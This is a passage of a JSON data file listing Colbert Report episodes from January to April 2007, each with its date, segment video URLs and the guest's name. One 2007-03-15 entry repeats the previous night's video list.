        "http://thecolbertreport.cc.com/videos/ezqjm4/jim-cramer",
        "http://thecolbertreport.cc.com/videos/q6rkb3/sign-off---farewell--james-brown"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2007-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b3d5l1/intro---1-10-07",
        "http://thecolbertreport.cc.com/videos/j5htgu/president-s-speech",
        "http://thecolbertreport.cc.com/videos/crgbvq/invasion-of-the-country-snatchers",
        "http://thecolbertreport.cc.com/videos/ie5gtu/the-word---worry",
        "http://thecolbertreport.cc.com/videos/048s3c/tek-jansen---hounds-of-hell--ragtime-billy-peaches",
        "http://thecolbertreport.cc.com/videos/ku9y06/david-kamp",
        "http://thecolbertreport.cc.com/videos/9nuye7/sign-off---thawing-meat"
      ],
      "guest": "David Kamp"
    },
    {
      "date": "2007-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/21xsg9/intro---1-11-07",
        "http://thecolbertreport.cc.com/videos/nhwjcd/what-number-is-stephen-thinking-of----doubled-up",
        "http://thecolbertreport.cc.com/videos/7v6i3c/ken-roth",
        "http://thecolbertreport.cc.com/videos/jxfsrm/tip-wag---science-and-technology",
        "http://thecolbertreport.cc.com/videos/fxnp1o/judy-woodruff"
      ],
      "guest": "Judy Woodruff"
    },
    {
      "date": "2007-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpjoll/intro---1-15-07",
        "http://thecolbertreport.cc.com/videos/bemyqb/inspired-by-dr--king",
        "http://thecolbertreport.cc.com/videos/ni7g5j/a-man-s-touch",
        "http://thecolbertreport.cc.com/videos/xb55y0/the-word---victory-",
        "http://thecolbertreport.cc.com/videos/eamlaf/bears---balls---gas",
        "http://thecolbertreport.cc.com/videos/o7xhwp/alex-kuczynski"
      ],
      "guest": "Alex Kuczynski"
    },
    {
      "date": "2007-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/795pdp/intro---1-16-07",
        "http://thecolbertreport.cc.com/videos/ycpx4s/squeaky-chair",
        "http://thecolbertreport.cc.com/videos/r7kinv/pesos-for-pizza",
        "http://thecolbertreport.cc.com/videos/hwlhus/the-word---symbolic",
        "http://thecolbertreport.cc.com/videos/6q6sy0/sport-report---bend-it-like-beckham",
        "http://thecolbertreport.cc.com/videos/2tdkm8/dinesh-d-souza"
      ],
      "guest": "Dinesh D'Souza"
    },
    {
      "date": "2007-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufcy26/intro---1-17-07",
        "http://thecolbertreport.cc.com/videos/8amkmh/200th-episode",
        "http://thecolbertreport.cc.com/videos/wjuko4/lynn-swann",
        "http://thecolbertreport.cc.com/videos/xv8tlv/better-know-a-district---washington-s-3rd---brian-baird",
        "http://thecolbertreport.cc.com/videos/1qdsbp/richard-clarke"
      ],
      "guest": "Richard Clarke"
    },
    {
      "date": "2007-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z0tcp1/intro---1-18-07",
        "http://thecolbertreport.cc.com/videos/kyc2cd/the-advent-of-o-reilly",
        "http://thecolbertreport.cc.com/videos/qtrfgo/the-word---go-it-alone",
        "http://thecolbertreport.cc.com/videos/dre6df/we-the-mediator---trump-v--o-donnell",
        "http://thecolbertreport.cc.com/videos/9seimt/bill-o-reilly",
        "http://thecolbertreport.cc.com/videos/cuouel/o-reilly-s-microwave"
      ],
      "guest": "Bill O'Reilly"
    },
    {
      "date": "2007-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9vl9tx/intro---1-22-07",
        "http://thecolbertreport.cc.com/videos/1t56vq/the-bears",
        "http://thecolbertreport.cc.com/videos/itbxtv/who-s-riding-my-coattails-now----terence-koh",
        "http://thecolbertreport.cc.com/videos/mfzk22/the-word---exact-words",
        "http://thecolbertreport.cc.com/videos/opisk9/balls-for-kidz---gambling",
        "http://thecolbertreport.cc.com/videos/rnd3lf/tom-schaller",
        "http://thecolbertreport.cc.com/videos/6mgw6m/sign-off---zeppelin-reunion"
      ],
      "guest": "Tom Schaller"
    },
    {
      "date": "2007-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xjsnlx/intro---1-23-07",
        "http://thecolbertreport.cc.com/videos/ebff8o/pre-tape",
        "http://thecolbertreport.cc.com/videos/vm00zm/lieber-vs--lieber",
        "http://thecolbertreport.cc.com/videos/jv328p/threatdown---the-weather-channel",
        "http://thecolbertreport.cc.com/videos/y849ls/michael-steele",
        "http://thecolbertreport.cc.com/videos/xxwpqf/wednesday-today"
      ],
      "guest": "Michael Steele"
    },
    {
      "date": "2007-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/goh39c/intro---1-24-07",
        "http://thecolbertreport.cc.com/videos/gzqy8i/state-of-the-union---cheney-wins",
        "http://thecolbertreport.cc.com/videos/e17mq9/the-word---great-news",
        "http://thecolbertreport.cc.com/videos/3525mn/better-know-a-district---pennsylvania-s-4th---jason-altmire",
        "http://thecolbertreport.cc.com/videos/r5j10b/lou-dobbs"
      ],
      "guest": "Lou Dobbs"
    },
    {
      "date": "2007-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n139mj/intro---1-25-07",
        "http://thecolbertreport.cc.com/videos/7z0x1m/right-away-",
        "http://thecolbertreport.cc.com/videos/5rmbin/the-word---smafu",
        "http://thecolbertreport.cc.com/videos/hkzk11/sport-report---more-with-coach-mancini",
        "http://thecolbertreport.cc.com/videos/tufln6/mike-wallace"
      ],
      "guest": "Mike Wallace"
    },
    {
      "date": "2007-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o0maxx/intro---1-29-07",
        "http://thecolbertreport.cc.com/videos/1m6mdm/new-york-grieves",
        "http://thecolbertreport.cc.com/videos/z0b9vz/stephen-colbert-day",
        "http://thecolbertreport.cc.com/videos/6p6df7/the-word---wikilobbying",
        "http://thecolbertreport.cc.com/videos/11js13/tip-wag---tom-cruise",
        "http://thecolbertreport.cc.com/videos/zqi973/barry-lando"
      ],
      "guest": "Barry M. Lando"
    },
    {
      "date": "2007-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/np3o3k/intro---1-30-07",
        "http://thecolbertreport.cc.com/videos/j1sd5a/new-military-weapon",
        "http://thecolbertreport.cc.com/videos/cv6q8o/david-leonhardt",
        "http://thecolbertreport.cc.com/videos/ttzs6x/caviar-omelets-for-the-troops",
        "http://thecolbertreport.cc.com/videos/bsbad5/judge--jury---executioner---adultery",
        "http://thecolbertreport.cc.com/videos/eyhp38/donna-shalala",
        "http://thecolbertreport.cc.com/videos/dwv24s/sign-off---microwave-gift-to-o-reilly"
      ],
      "guest": "Donna Shalala"
    },
    {
      "date": "2007-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84e6zh/exclusive---better-know-a-district---new-york-s-6th---gregory-meeks",
        "http://thecolbertreport.cc.com/videos/4mp2yh/intro---1-31-07",
        "http://thecolbertreport.cc.com/videos/v1la3q/global-warming",
        "http://thecolbertreport.cc.com/videos/3emlxq/on-notice---jane-fonda-fantasies",
        "http://thecolbertreport.cc.com/videos/qg7l5c/the-word---black-sheep",
        "http://thecolbertreport.cc.com/videos/4lodkc/better-know-a-district---new-york-s-6th---gregory-meeks",
        "http://thecolbertreport.cc.com/videos/npjb41/jed-babbin"
      ],
      "guest": "Jed Babbin"
    },
    {
      "date": "2007-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/89lmed/intro---2-1-07",
        "http://thecolbertreport.cc.com/videos/mzq0ue/cartoon-terrorism",
        "http://thecolbertreport.cc.com/videos/492fjx/ending-racism",
        "http://thecolbertreport.cc.com/videos/rbb68f/the-word---we-shall-overcome",
        "http://thecolbertreport.cc.com/videos/2m3ntu/movies-that-are-destroying-america---oscars-edition",
        "http://thecolbertreport.cc.com/videos/s2k3ll/chuck-schumer",
        "http://thecolbertreport.cc.com/videos/b1j62r/the-most-poetic-f--king-thing-i-ve-ever-heard"
      ],
      "guest": "Sen. Chuck Schumer"
    },
    {
      "date": "2007-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qonzal/intro---2-5-07",
        "http://thecolbertreport.cc.com/videos/raqy45/peyton-manseed",
        "http://thecolbertreport.cc.com/videos/1ppbxw/save-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/pkx5sp/the-word---second-opinion",
        "http://thecolbertreport.cc.com/videos/cu6q1h/threatdown---giant-mexican-babies",
        "http://thecolbertreport.cc.com/videos/qj7ov5/wendy-kopp"
      ],
      "guest": "Wendy Kopp"
    },
    {
      "date": "2007-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/irg0ck/exclusive---better-know-a-district---ohio-s-18th---zack-space-pt--1",
        "http://thecolbertreport.cc.com/videos/7vpqnl/exclusive---better-know-a-district---ohio-s-18th---zack-space-pt--2",
        "http://thecolbertreport.cc.com/videos/w05aan/intro---2-6-07",
        "http://thecolbertreport.cc.com/videos/rirgzz/pray-for-stephen",
        "http://thecolbertreport.cc.com/videos/ronvu0/the-word---making-a-killing",
        "http://thecolbertreport.cc.com/videos/sh2kz6/better-know-a-district---ohio-s-18th---zack-space",
        "http://thecolbertreport.cc.com/videos/vnbq6e/charles-leduff"
      ],
      "guest": "Charlie LeDuff"
    },
    {
      "date": "2007-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lh3p6z/intro---2-7-07",
        "http://thecolbertreport.cc.com/videos/skowle/the-san-francisco-treat",
        "http://thecolbertreport.cc.com/videos/hx3kkt/california-values-watch",
        "http://thecolbertreport.cc.com/videos/fykjnf/the-word---silence",
        "http://thecolbertreport.cc.com/videos/pp2kiz/tek-jansen---from-the-future",
        "http://thecolbertreport.cc.com/videos/n36pgb/steven-pinker"
      ],
      "guest": "Steven Pinker"
    },
    {
      "date": "2007-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5l6ygo/intro---2-8-07",
        "http://thecolbertreport.cc.com/videos/btxrus/space-madness",
        "http://thecolbertreport.cc.com/videos/q5bcg9/stephen-for-president---a-sign",
        "http://thecolbertreport.cc.com/videos/12d71h/debra-dickerson",
        "http://thecolbertreport.cc.com/videos/ls3y3l/was-it-really-that-bad----salem-witch-trials",
        "http://thecolbertreport.cc.com/videos/m5tx4f/chris-hedges"
      ],
      "guest": "Chris Hedges"
    },
    {
      "date": "2007-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sudz5h/intro---2-12-07",
        "http://thecolbertreport.cc.com/videos/cvs0b4/the-word---inappropriate",
        "http://thecolbertreport.cc.com/videos/wetex5/tip-wag---john-howard",
        "http://thecolbertreport.cc.com/videos/ovmu6y/michael-oppenheimer",
        "http://thecolbertreport.cc.com/videos/gbc95s/alpha-dog-of-the-week---amitabh-bachchan"
      ],
      "guest": "Michael Oppenheimer"
    },
    {
      "date": "2007-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7zlyvc/the-word---apocalypse-mao--murdered-by-the-orient-s-success---frenemy",
        "http://thecolbertreport.cc.com/videos/dh1nxa/apocalypse-mao--murdered-by-the-orient-s-success---take-the-pulse",
        "http://thecolbertreport.cc.com/videos/cbgmhg/sheryl-wudunn",
        "http://thecolbertreport.cc.com/videos/rewkbj/apocalypse-mao--murdered-by-the-orient-s-success---eight-child-policy"
      ],
      "guest": "Sheryl WuDunn"
    },
    {
      "date": "2007-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0unos7/catching-up-with-china",
        "http://thecolbertreport.cc.com/videos/sv6om5/safe-sex-for-senior-citizens",
        "http://thecolbertreport.cc.com/videos/qngp8d/the-word---bad-medicine",
        "http://thecolbertreport.cc.com/videos/e7leqz/stephen-protects-valentine-s-day",
        "http://thecolbertreport.cc.com/videos/npsgvg/sport-report---westminster-kennel-club-dog-show",
        "http://thecolbertreport.cc.com/videos/tv0pg5/lance-armstrong",
        "http://thecolbertreport.cc.com/videos/4zrnjn/intro---2-14-07"
      ],
      "guest": "Lance Armstrong"
    },
    {
      "date": "2007-02-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bemh6r/intro---2-15-07",
        "http://thecolbertreport.cc.com/videos/5h0hc1/the-365-most-influential-cultural-figures-of-2007---j-j--abrams",
        "http://thecolbertreport.cc.com/videos/dv94hn/helen-thomas-s-chair",
        "http://thecolbertreport.cc.com/videos/xsukru/the-365-most-influential-cultural-figures-of-2007---candice-bergen",
        "http://thecolbertreport.cc.com/videos/gxjtk4/better-know-a-district---arkansas--2nd---vic-snyder",
        "http://thecolbertreport.cc.com/videos/htsqly/shashi-tharoor"
      ],
      "guest": "Shashi Tharoor"
    },
    {
      "date": "2007-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7kzllg/intro---2-26-07",
        "http://thecolbertreport.cc.com/videos/6q3fey/the-word---success",
        "http://thecolbertreport.cc.com/videos/liy97p/stephen-s-sound-advice---avoiding-humiliation-on-the-campaign-trail",
        "http://thecolbertreport.cc.com/videos/rj64v2/zev-chafets",
        "http://thecolbertreport.cc.com/videos/lto66u/sign-off---the-stupidest-person-in-the-world"
      ],
      "guest": "Zev Chafets"
    },
    {
      "date": "2007-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m6llmb/intro---2-27-07",
        "http://thecolbertreport.cc.com/videos/4q8yqr/gore-s-garbage",
        "http://thecolbertreport.cc.com/videos/08vl33/the-word---recoil",
        "http://thecolbertreport.cc.com/videos/kyuvud/dead-to-me---raptors",
        "http://thecolbertreport.cc.com/videos/a5eovz/tip-wag---bilk",
        "http://thecolbertreport.cc.com/videos/xtu2o9/craig-venter"
      ],
      "guest": "Dr. Craig Venter"
    },
    {
      "date": "2007-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k64d0x/intro---2-28-07",
        "http://thecolbertreport.cc.com/videos/94efgl/david-geffen-the-intern-",
        "http://thecolbertreport.cc.com/videos/ax1yhn/obama-vs--colbert",
        "http://thecolbertreport.cc.com/videos/2j1fug/profiles-in-quitters---tom-vilsack",
        "http://thecolbertreport.cc.com/videos/2w1ttr/problems-without-solutions--stay-at-home-dads",
        "http://thecolbertreport.cc.com/videos/rjcwpq/nina-jablonski"
      ],
      "guest": "Nina Jablonski"
    },
    {
      "date": "2007-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvhlbh/intro---3-1-07",
        "http://thecolbertreport.cc.com/videos/dnoicn/jesus--1-",
        "http://thecolbertreport.cc.com/videos/09pfnw/the-word---bury-the-lead",
        "http://thecolbertreport.cc.com/videos/xp8ghf/better-know-a-district---tennessee-s-9th---steve-cohen",
        "http://thecolbertreport.cc.com/videos/hdb72u/larry-king",
        "http://thecolbertreport.cc.com/videos/din9ey/sign-off---all-the-time"
      ],
      "guest": "Larry King"
    },
    {
      "date": "2007-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s5zpws/intro---3-5-07",
        "http://thecolbertreport.cc.com/videos/f0veng/stop-the-war-in-congress",
        "http://thecolbertreport.cc.com/videos/9rmkm6/ben-and-jerry---introducing-americone-dream",
        "http://thecolbertreport.cc.com/videos/erco0p/bears---balls---bees",
        "http://thecolbertreport.cc.com/videos/w9i285/mara-vanderslice",
        "http://thecolbertreport.cc.com/videos/u5x46t/sign-off---you-get-a-pint-"
      ],
      "guest": "Mara Vanderslice, Ben and Jerry"
    },
    {
      "date": "2007-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jokvk3/intro---3-6-07",
        "http://thecolbertreport.cc.com/videos/987dug/stephen-wins-the-lottery",
        "http://thecolbertreport.cc.com/videos/5xpqn0/libby-verdict",
        "http://thecolbertreport.cc.com/videos/yjwisn/the-word---wwjd",
        "http://thecolbertreport.cc.com/videos/ryt5zt/threatdown---cheney-s-clot",
        "http://thecolbertreport.cc.com/videos/d9k0w9/mark-frauenfelder"
      ],
      "guest": "Mark Frauenfelder"
    },
    {
      "date": "2007-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t3l2qk/intro---3-7-07",
        "http://thecolbertreport.cc.com/videos/o5rj01/mega-millions",
        "http://thecolbertreport.cc.com/videos/f4wilr/the-word---don-t",
        "http://thecolbertreport.cc.com/videos/mw47n3/easter-under-attack---bunny",
        "http://thecolbertreport.cc.com/videos/k8n6ln/michael-spector",
        "http://thecolbertreport.cc.com/videos/eu60l7/sign-off---colbert-savings-time"
      ],
      "guest": "Michael Specter"
    },
    {
      "date": "2007-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hdanpb/exclusive---better-know-a-district---kentucky-s-3rd---john-yarmuth-pt--1",
        "http://thecolbertreport.cc.com/videos/1fsr4r/exclusive---better-know-a-district---kentucky-s-3rd---john-yarmuth-pt--2",
        "http://thecolbertreport.cc.com/videos/v9pxbp/intro---3-8-07",
        "http://thecolbertreport.cc.com/videos/fkezkh/jesus-libby",
        "http://thecolbertreport.cc.com/videos/kf01z4/the-word---comic-justice",
        "http://thecolbertreport.cc.com/videos/gfi7dr/better-know-a-district---kentucky-s-3rd---john-yarmuth",
        "http://thecolbertreport.cc.com/videos/na2cwe/ted-koppel"
      ],
      "guest": "Ted Koppel"
    },
    {
      "date": "2007-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eoubiy/intro---3-12-07",
        "http://thecolbertreport.cc.com/videos/cxle7m/newt-gingrich-s-extramarital-affair",
        "http://thecolbertreport.cc.com/videos/qs3d07/the-word---home-field-advantage",
        "http://thecolbertreport.cc.com/videos/rp8fy7/tip-wag---u-s--mint",
        "http://thecolbertreport.cc.com/videos/0z68wk/nicholas-kristof",
        "http://thecolbertreport.cc.com/videos/paedah/sign-off---captain-america-shield"
      ],
      "guest": "Nicholas D. Kristof"
    },
    {
      "date": "2007-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3gv9du/intro---3-13-07",
        "http://thecolbertreport.cc.com/videos/n1695w/time-travel",
        "http://thecolbertreport.cc.com/videos/o93g04/willie-nelson-s-cobbler",
        "http://thecolbertreport.cc.com/videos/aln9gt/donald-shields",
        "http://thecolbertreport.cc.com/videos/nebseq/four-horsemen-of-the-a-pop-calypse---300",
        "http://thecolbertreport.cc.com/videos/pajwaw/michael-eric-dyson",
        "http://thecolbertreport.cc.com/videos/goeagu/the-word---goodnight"
      ],
      "guest": "Michael Eric Dyson"
    },
    {
      "date": "2007-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gjg322/intro---3-14-07",
        "http://thecolbertreport.cc.com/videos/mi3odp/when-ancestors-attack---barack-obama",
        "http://thecolbertreport.cc.com/videos/jdieqt/the-word---high-fidelity",
        "http://thecolbertreport.cc.com/videos/6t5ydk/rocky-mountain-high",
        "http://thecolbertreport.cc.com/videos/xy5mon/sport-report---ncaa",
        "http://thecolbertreport.cc.com/videos/3w6h8k/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/x40idi/sign-off---united-we-lick"
      ],
      "guest": "Ed Viesturs"
    },
    {
      "date": "2007-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3yjwcu/exclusive---better-know-a-district---illinois--17th---phil-hare-pt--1",
        "http://thecolbertreport.cc.com/videos/l2j89r/exclusive---better-know-a-district---illinois--17th---phil-hare-pt--2",
        "http://thecolbertreport.cc.com/videos/gjg322/intro---3-14-07",
        "http://thecolbertreport.cc.com/videos/mi3odp/when-ancestors-attack---barack-obama",
        "http://thecolbertreport.cc.com/videos/jdieqt/the-word---high-fidelity",
        "http://thecolbertreport.cc.com/videos/6t5ydk/rocky-mountain-high",
        "http://thecolbertreport.cc.com/videos/xy5mon/sport-report---ncaa",
        "http://thecolbertreport.cc.com/videos/3w6h8k/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/x40idi/sign-off---united-we-lick"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2007-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/in8gsh/intro---3-15-07",
        "http://thecolbertreport.cc.com/videos/ojcmho/st--patrick-s-day",
        "http://thecolbertreport.cc.com/videos/9wsh6f/better-know-a-district---illinois--17th---phil-hare",
        "http://thecolbertreport.cc.com/videos/pvxlng/ayaan-hirsi-ali",
        "http://thecolbertreport.cc.com/videos/nfjx5l/sign-off---candy"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2007-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/akdm39/intro---3-19-07",
        "http://thecolbertreport.cc.com/videos/zfhuml/emanuel-attacks-stephen",
        "http://thecolbertreport.cc.com/videos/ichd6m/the-word---pound-of-flesh",
        "http://thecolbertreport.cc.com/videos/ovsoy3/willie-nelson-tomorrow",
        "http://thecolbertreport.cc.com/videos/i34oa7/threatdown---seniors",
        "http://thecolbertreport.cc.com/videos/nby1fe/jerome-groopman",
        "http://thecolbertreport.cc.com/videos/woj3kf/alpha-dog-of-the-week---pennies"
      ],
      "guest": "Jerome Groopman"
    },
    {
      "date": "2007-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nepea4/intro---3-20-07",
        "http://thecolbertreport.cc.com/videos/p3nkju/willie-recall",
        "http://thecolbertreport.cc.com/videos/8w2rhi/the-word---supernatural",
        "http://thecolbertreport.cc.com/videos/4fyygp/threatdown---polar-bear-cub",
        "http://thecolbertreport.cc.com/videos/rn79kl/stephen-colbert-day---honor",
        "http://thecolbertreport.cc.com/videos/fxdmt0/willie-nelson"
      ],
      "guest": "Willie Nelson"
    },
    {
      "date": "2007-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b4r6li/intro---3-21-07",
        "http://thecolbertreport.cc.com/videos/r7dj9j/stephen-s-stoned-friend",
        "http://thecolbertreport.cc.com/videos/wyig4v/impeach-bush",
        "http://thecolbertreport.cc.com/videos/js464k/the-word---sex",
        "http://thecolbertreport.cc.com/videos/6b13mn/better-know-a-district---new-york-s-22nd---maurice-hinchey",
        "http://thecolbertreport.cc.com/videos/4jygnv/benjamin-barber",
        "http://thecolbertreport.cc.com/videos/psro3f/sign-off---goodnights"
      ],
      "guest": "Benjamin Barber"
    },
    {
      "date": "2007-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rf90w7/intro---3-22-07",
        "http://thecolbertreport.cc.com/videos/yic3o0/infomosexual-graphics",
        "http://thecolbertreport.cc.com/videos/ez9npn/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/xgjo8q/face-reading-expert",
        "http://thecolbertreport.cc.com/videos/pd3hdf/sport-report---ncaa-final-four",
        "http://thecolbertreport.cc.com/videos/i2wwym/katie-couric",
        "http://thecolbertreport.cc.com/videos/k6m8na/sign-off---future"
      ],
      "guest": "Katie Couric"
    },
    {
      "date": "2007-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k1iiew/intro---3-26-07",
        "http://thecolbertreport.cc.com/videos/t9n8i2/mummy",
        "http://thecolbertreport.cc.com/videos/t7x0xg/torture-gonzales",
        "http://thecolbertreport.cc.com/videos/hc58hq/for-your-editing-pleasure",
        "http://thecolbertreport.cc.com/videos/r6ez6r/stephen-colbert-day",
        "http://thecolbertreport.cc.com/videos/a19udk/john-perry-barlow",
        "http://thecolbertreport.cc.com/videos/dc5qfy/sign-off---photo-op"
      ],
      "guest": "John Perry Barlow"
    },
    {
      "date": "2007-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9hzwxa/intro---3-2707",
        "http://thecolbertreport.cc.com/videos/ct77qc/sean-penn-unleashes-on-president-bush",
        "http://thecolbertreport.cc.com/videos/y05sqg/madeleine-albright",
        "http://thecolbertreport.cc.com/videos/ac6sto/tip-wag---drug-dealers",
        "http://thecolbertreport.cc.com/videos/z3a4ow/james-fallows"
      ],
      "guest": "Madeleine Albright, James Fallows"
    },
    {
      "date": "2007-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c3lbed/intro---3-28-07",
        "http://thecolbertreport.cc.com/videos/8b58j1/dancing-with-the-stars",
        "http://thecolbertreport.cc.com/videos/eoe8d4/claim-to-the-arctic",
        "http://thecolbertreport.cc.com/videos/e6rbbg/the-word---monkey-business",
        "http://thecolbertreport.cc.com/videos/7t7l7y/the-axis-of-evil-of-the-week",
        "http://thecolbertreport.cc.com/videos/oval1w/jabari-asim",
        "http://thecolbertreport.cc.com/videos/tffkup/sign-off---going-to-bed-angry"
      ],
      "guest": "Jabari Asim"
    },
    {
      "date": "2007-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/82ki4g/intro---3-29-07",
        "http://thecolbertreport.cc.com/videos/yp03mv/equal-rights",
        "http://thecolbertreport.cc.com/videos/bwtu8b/strolling-in-baghdad",
        "http://thecolbertreport.cc.com/videos/m1iokb/the-word---lemon-raid",
        "http://thecolbertreport.cc.com/videos/rmylpg/alpha-dog-of-the-week---toby",
        "http://thecolbertreport.cc.com/videos/dune0v/nightgown-novel-model",
        "http://thecolbertreport.cc.com/videos/gp6vcm/clive-james",
        "http://thecolbertreport.cc.com/videos/cnmwu7/sign-off---it-s-been-real"
      ],
      "guest": "Clive James"
    },
    {
      "date": "2007-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2secqi/intro---4-9-07",
        "http://thecolbertreport.cc.com/videos/c2ss4c/end-of-lent",
        "http://thecolbertreport.cc.com/videos/jdh0qr/colin-beavan",
        "http://thecolbertreport.cc.com/videos/p1vkhv/ethnic-slurs",
        "http://thecolbertreport.cc.com/videos/uyodpo/formula-401k",
        "http://thecolbertreport.cc.com/videos/d7vjve/katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/vx3kr4/sign-off---goodnight--ladies"
      ],
      "guest": "Colin Beavan, Katrina vanden Heuvel"
    },
    {
      "date": "2007-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gqey9e/intro---4-10-07",
        "http://thecolbertreport.cc.com/videos/t52s2y/stiff-upper-lip",
        "http://thecolbertreport.cc.com/videos/7xhdfc/the-word---hip-replacement",
        "http://thecolbertreport.cc.com/videos/a6j19l/stephen-s-racial-slurs",
        "http://thecolbertreport.cc.com/videos/mmtey6/bears---balls---home",
        "http://thecolbertreport.cc.com/videos/niryzs/jeannette-walls",
        "http://thecolbertreport.cc.com/videos/tjfkfk/the-apology"
      ],
      "guest": "Jeannette Walls"
    },
    {
      "date": "2007-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ikived/intro---4-11-07",
        "http://thecolbertreport.cc.com/videos/rndpay/the-great-turtle-race",
        "http://thecolbertreport.cc.com/videos/o57n2d/the-word---season-pass",
        "http://thecolbertreport.cc.com/videos/y3z7pz/anna-nicole-s-baby-daddy",
        "http://thecolbertreport.cc.com/videos/qk7xuu/sport-report---spirit-loses",
        "http://thecolbertreport.cc.com/videos/6ombuy/vali-nasr",
        "http://thecolbertreport.cc.com/videos/py0zro/sign-off---not-literally"
      ],
      "guest": "Vali Nasr"
    },
    {
      "date": "2007-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tvo9j1/intro---4-12-07",
        "http://thecolbertreport.cc.com/videos/44wpo2/the-pope-and-iraq",
        "http://thecolbertreport.cc.com/videos/i2w6da/the-word---body-armor",
        "http://thecolbertreport.cc.com/videos/rp5qr3/a-girl-for-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/szc2kp/dr--richard-land",
        "http://thecolbertreport.cc.com/videos/z4a9cf/sign-off---french-canadian-viewers"
      ],
      "guest": "Dr. Richard Land"
    },
    {
      "date": "2007-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/opgo7c/intro---4-16-07",
        "http://thecolbertreport.cc.com/videos/ow68vg/mope-retraction",
        "http://thecolbertreport.cc.com/videos/ndyxmi/the-metaphor-off-is-on",
        "http://thecolbertreport.cc.com/videos/fiwckw/the-word---clean-slate",
        "http://thecolbertreport.cc.com/videos/vsf7vy/paulina-likes-stephen",
        "http://thecolbertreport.cc.com/videos/le9tdo/alpha-dog-of-the-week---paul-wolfowitz",
        "http://thecolbertreport.cc.com/videos/yq2yld/sign-off---fondest-memories",
        "http://thecolbertreport.cc.com/videos/1dnqiw/john-kerry"
      ],
      "guest": "Sen. John Kerry"
    },
    {
      "date": "2007-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35u6vo/metaphor-off-training",
        "http://thecolbertreport.cc.com/videos/ctnp41/turtle-race-update",
        "http://thecolbertreport.cc.com/videos/k0gjix/the-word---plan-b",
        "http://thecolbertreport.cc.com/videos/1ca1nf/tip-wag---fake-sperm",
        "http://thecolbertreport.cc.com/videos/ofyxod/elaine-pagels",
        "http://thecolbertreport.cc.com/videos/ka39h6/sign-off---stephen-s-taxes",
        "http://thecolbertreport.cc.com/videos/28ne1f/intro---4-17-07"
      ],
      "guest": "Elaine Pagels"
    },
    {
      "date": "2007-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xjlfa3/intro---4-18-07",
        "http://thecolbertreport.cc.com/videos/z7yfgh/who-s-not-honoring-me-now----pulitzer",
        "http://thecolbertreport.cc.com/videos/y8uyv4/the-word---branding",
        "http://thecolbertreport.cc.com/videos/d5i37n/national-library-week---frank-mccourt",
        "http://thecolbertreport.cc.com/videos/hr8hfi/milk---hormones",
        "http://thecolbertreport.cc.com/videos/edyu8c/national-library-week---sebastian-junger",
        "http://thecolbertreport.cc.com/videos/ebje1q/national-library-week---david-remnick",
        "http://thecolbertreport.cc.com/videos/33tv9j/paulina-porizkova",
        "http://thecolbertreport.cc.com/videos/tn0cbn/sign-off---upcoming-metaphor-off"
      ],
      "guest": "William Cohen"
    },
    {
      "date": "2007-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wh0xf2/intro---4-19-07",
        "http://thecolbertreport.cc.com/videos/luoh3l/god-s-pet-chimp",
        "http://thecolbertreport.cc.com/videos/goj3np/the-word----400-haircut",
